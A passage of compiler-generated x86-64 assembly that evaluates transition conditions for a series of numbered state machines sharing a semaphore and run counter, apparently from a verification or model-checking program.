movq _run@GOTPCREL(%rip), %rax
cmpl $7, (%rax)
jne LBB1_297
## %bb.296: ## in Loop: Header=BB1_70 Depth=1
movq _sm7_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_297: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_299
## %bb.298: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm8_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm8_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_301
LBB1_299: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_301
## %bb.300: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_301: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_303
## %bb.302: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_304
LBB1_303: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm8_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_304: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_306
## %bb.305: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm8_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_306: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_309
## %bb.307: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_309
## %bb.308: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm8_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_309: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_313
## %bb.310: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_313
## %bb.311: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_313
## %bb.312: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_313: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm8_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_318
## %bb.314: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_317
## %bb.315: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_317
## %bb.316: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_318
LBB1_317: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $8, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_318: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_321
## %bb.319: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $8, (%rax)
jne LBB1_321
## %bb.320: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_321: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_325
## %bb.322: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_325
## %bb.323: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $8, (%rax)
jne LBB1_325
## %bb.324: ## in Loop: Header=BB1_70 Depth=1
movq _sm8_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_325: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_327
## %bb.326: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm9_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm9_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_329
LBB1_327: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_329
## %bb.328: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_329: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_331
## %bb.330: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_332
LBB1_331: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm9_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_332: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_334
## %bb.333: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm9_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_334: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_337
## %bb.335: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_337
## %bb.336: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm9_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_337: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_341
## %bb.338: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_341
## %bb.339: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_341
## %bb.340: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_341: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm9_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_346
## %bb.342: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_345
## %bb.343: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_345
## %bb.344: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_346
LBB1_345: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $9, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_346: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_349
## %bb.347: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $9, (%rax)
jne LBB1_349
## %bb.348: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_349: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_353
## %bb.350: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_353
## %bb.351: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $9, (%rax)
jne LBB1_353
## %bb.352: ## in Loop: Header=BB1_70 Depth=1
movq _sm9_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_353: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_355
## %bb.354: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm10_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm10_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_357
LBB1_355: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_357
## %bb.356: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_357: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_359
## %bb.358: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_360
LBB1_359: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm10_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_360: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_362
## %bb.361: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm10_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_362: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_365
## %bb.363: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_365
## %bb.364: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm10_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_365: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_369
## %bb.366: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_369
## %bb.367: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_369
## %bb.368: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_369: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm10_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_374
## %bb.370: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_373
## %bb.371: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_373
## %bb.372: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_374
LBB1_373: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $10, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_374: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_377
## %bb.375: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $10, (%rax)
jne LBB1_377
## %bb.376: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_377: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_381
## %bb.378: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_381
## %bb.379: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $10, (%rax)
jne LBB1_381
## %bb.380: ## in Loop: Header=BB1_70 Depth=1
movq _sm10_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_381: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_383
## %bb.382: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm11_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm11_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_385
LBB1_383: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_385
## %bb.384: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_385: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_387
## %bb.386: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_388
LBB1_387: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm11_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_388: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_390
## %bb.389: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm11_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_390: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_393
## %bb.391: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_393
## %bb.392: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm11_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_393: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_397
## %bb.394: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_397
## %bb.395: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_397
## %bb.396: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_397: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm11_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_402
## %bb.398: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_401
## %bb.399: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_401
## %bb.400: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_402
LBB1_401: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $11, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_402: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_405
## %bb.403: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $11, (%rax)
jne LBB1_405
## %bb.404: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_405: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_409
## %bb.406: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_409
## %bb.407: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $11, (%rax)
jne LBB1_409
## %bb.408: ## in Loop: Header=BB1_70 Depth=1
movq _sm11_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_409: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_411
## %bb.410: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm12_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm12_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_413
LBB1_411: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_413
## %bb.412: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_413: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_415
## %bb.414: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_416
LBB1_415: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm12_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_416: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_418
## %bb.417: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm12_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_418: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_421
## %bb.419: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_421
## %bb.420: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm12_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_421: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_425
## %bb.422: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_425
## %bb.423: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_425
## %bb.424: ## in Loop: Header=BB1_70 Depth=1
movq _sm12_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
